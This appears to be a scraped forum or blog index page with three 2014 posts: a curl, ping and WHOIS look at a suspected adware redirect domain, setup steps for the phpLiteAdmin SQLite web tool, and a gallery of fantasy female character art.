$ curl -v http://mavoo.net/go/51aG0GkraJJ3Doa4t_3KeIzpixbHdO-DUfGHqC2sgmNyQpnBIwZ7DMfCVLMsksskt0DojOlkWwULfH9HpvTPY9wQG3PIznQO-2IAeYVU2YTEB1117CK7WRGEPRKqjBGfP_aYvHgEHcLJnZnr8t9AIQ0UTe0RNzIc0ifCQoPzRX1AvVIsF4m5ASZPQP-4FZTm12-70mNJR25z_Qw6c8G1bCs5a9ns6dPlOvNzRvrzGLLf7t4Q19IsgETknXoi3PMMdN8IZpjEdotGv3gud_nd7CtnC9lJPlp2R8z9baHvJArSevFh2EygMsumGflvHEHPZ7FkaHAWYCKFa8DdOcQUwJRnGqyIx1d-TSeH-426coMXHV4_jfebObDHCoTL3j-L/K4F8RO9ZHuBaYQQY6zc2oll0svmOb_0z6Chp0AcfkSw,
* About to connect() to mavoo.net port 80 (#0)
*   Trying 213.211.147.115... connected
> GET /go/51aG0GkraJJ3Doa4t_3KeIzpixbHdO-DUfGHqC2sgmNyQpnBIwZ7DMfCVLMsksskt0DojOlkWwULfH9HpvTPY9wQG3PIznQO-2IAeYVU2YTEB1117CK7WRGEPRKqjBGfP_aYvHgEHcLJnZnr8t9AIQ0UTe0RNzIc0ifCQoPzRX1AvVIsF4m5ASZPQP-4FZTm12-70mNJR25z_Qw6c8G1bCs5a9ns6dPlOvNzRvrzGLLf7t4Q19IsgETknXoi3PMMdN8IZpjEdotGv3gud_nd7CtnC9lJPlp2R8z9baHvJArSevFh2EygMsumGflvHEHPZ7FkaHAWYCKFa8DdOcQUwJRnGqyIx1d-TSeH-426coMXHV4_jfebObDHCoTL3j-L/K4F8RO9ZHuBaYQQY6zc2oll0svmOb_0z6Chp0AcfkSw, HTTP/1.1
> User-Agent: curl/7.22.0 (x86_64-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3
> Host: mavoo.net
> Accept: */*
>
< HTTP/1.1 302 Found
< Server: nginx
< Date: Sat, 13 Sep 2014 05:40:27 GMT
< Content-Type: text/html
< Transfer-Encoding: chunked
< Connection: keep-alive
< X-Powered-By: PHP/5.4.13
< Location: http://mavoo.net/?q=bestbuy
<
* Connection #0 to host mavoo.net left intact
* Closing connection #0




Mavoo.net: An Adware or Trojane? (2014)



代碼:

$ ping mavoo.net
PING mavoo.net (213.211.147.115) 56(84) bytes of data.
64 bytes from 213.211.147.115: icmp_req=1 ttl=56 time=175 ms
64 bytes from 213.211.147.115: icmp_req=2 ttl=56 time=175 ms


Registrar WHOIS Server: whois.bizcn.com
Registrar URL: http://www.bizcn.com
Updated Date: 2014-08-19T08:51:18Z
Creation Date: 2013-12-27T15:18:59Z
Registrar Registration Expiration Date: 2015-12-27T15:18:59Z
Registrar: Bizcn.com,Inc.
Registrar IANA ID: 471
Registrar Abuse Contact Email: abuse@bizcn.com
Registrar Abuse Contact Phone: +86.5922577888
Reseller: Cnobin Technology HK Limited
Domain Status: clientDeleteProhibited
Domain Status: clientTransferProhibited
Registry Registrant ID:
Registrant Name: Wuxi Yilian LLC
Registrant Organization: Wuxi Yilian LLC
Registrant Street: No.1001 Anling Road
Registrant City: Xiamen
Registrant State/Province: Fujian
Registrant Postal Code: 361008
Registrant Country: cn
Registrant Phone: +86.5922577888
Registrant Phone Ext:
Registrant Fax: +86.5922179606
Registrant Fax Ext:
Registrant Email: whoisprivacyprotect@whoisservices.cn
Registry Admin ID:
Admin Name: Wuxi Yilian LLC
Admin Organization: Wuxi Yilian LLC
Admin Street: No.1001 Anling Road
Admin City: Xiamen
Admin State/Province: Fujian
Admin Postal Code: 361008
Admin Country: cn
Admin Phone: +86.5922577888
Admin Phone Ext:
Admin Fax: +86.5922179606
Admin Fax Ext:
Admin Email: whoisprivacyprotect@whoisservices.cn
Registry Tech ID:
Tech Name: Wuxi Yilian LLC
Tech Organization: Wuxi Yilian LLC
Tech Street: No.1001 Anling Road
Tech City: Xiamen
Tech State/Province: Fujian
Tech Postal Code: 361008
Tech Country: cn
Tech Phone: +86.5922577888
Tech Phone Ext:
Tech Fax: +86.5922179606
Tech Fax Ext:
Tech Email: whoisprivacyprotect@whoisservices.cn
Name Server: ns3.cnmsn.com
Name Server: ns4.cnmsn.com
DNSSEC: NotsignedDelegation
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.n

(2014-09-13 14:07)

[h1]phpsqliteadmin: SQLite2/SQLite3 Web Management Interfaces[/h1]


Download
=> http://sourceforge.net/projects/phpsqliteadmin/

// Latest Version: 1.9.5
// Summary: PHP-based admin tool to manage SQLite2 and SQLite3 databases on the web
// Last updated: 2014-01-14

Usage:
=> Very easy, just like phpmyadm (MYSQL web administration)


Setup
=> Read the README


代碼:

If you want to do this:
  - rename phpliteadmin.config.sample.php into phpliteadmin.config.php
    (Or, something else, yet you have to revise that as well in phpliteadmin.php)
 
- do not change the settings in phpliteadmin.php but in phpliteadmin.config.php
  See https://code.google.com/p/phpliteadmin/wiki/Configuration for details.

    1. Open phpliteadmin.config.php (or phpliteadmin.php) in a text editor.

    2. If you want to have a directory scanned for your databases instead of listing them manually, specify the directory as the value of the $directory variable and skip to step 4.

    3. If you want to specify your databases manually, set the value of the $directory variable as false and modify the $databases array to hold the databases you would like to manage.

        - The path field is the file path of the database relative to where phpliteadmin.php will be located on the server. For example, if phpliteadmin.php is located at "databases/manager/phpliteadmin.php" and you want to manage "databases/yourdatabase.sqlite", the path value would be "../yourdatabase.sqlite".

        - The name field is the human-friendly way of referencing the database within the application. It can be anything you want.

    4. Modify the $password variable to be the password used for gaining access to the phpLiteAdmin tool.

    5. If you want to have multiple installations of phpLiteAdmin on the same server, change the $cookie_name variable to be unique for each installation (optional).

    6. Save and upload phpliteadmin.php to your web server.

    7. Open a web browser and navigate to the uploaded phpliteadmin.php file. You will be prompted to enter a password. Use the same password you set in step 4.


(2014-09-09 22:51)

[center]Sci-Fi Female Char Design Art[/center]
##DIV##
[center]
[h1]奇幻人設、角色設定、女性角色 - da830618(barabababa) Sci-Fi Female Char Art Design[/h1]

gbvrd
行軍之類的 - Army journey


1adcsdc3
練習來著 - sorceress


acvcad11
魔女 - sorceress


sdcsdc1
天使騎士和龍 - Knight & Dragon


argfeagfvaa2444
女騎士:一個凱旋的概念 - Triumph Knight

[hr]
More da830618(BARABABABA)'s Artoworks

http://vovo2000.com/paintbbs/art/da830618/
http://vovo2000.com/artist/da830618/

[hr]
See Also:
[url=http://vovo2000.com/tags/盔甲/]
「盔甲」相關創作 :: "Armor" Design Fine-Art
[/url]

[url=http://vovo2000.com/tags/騎士/]
「騎士」相關創作 :: "Knight" Artworks Drawing
[/url]

[url=http://vovo2000.com/tags/女/]
「女」相關創作 :: "Female/Girl" Creation Painting
[/url]

[url=http://vovo2000.com/tags/戰爭/]
「戰爭」相關創作 :: "Female/Girl" Creation Painting
[/url]


[/center](2014-09-09 00:46)

前往頁面 ←上一頁  1 ... 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 ... 558  下一頁→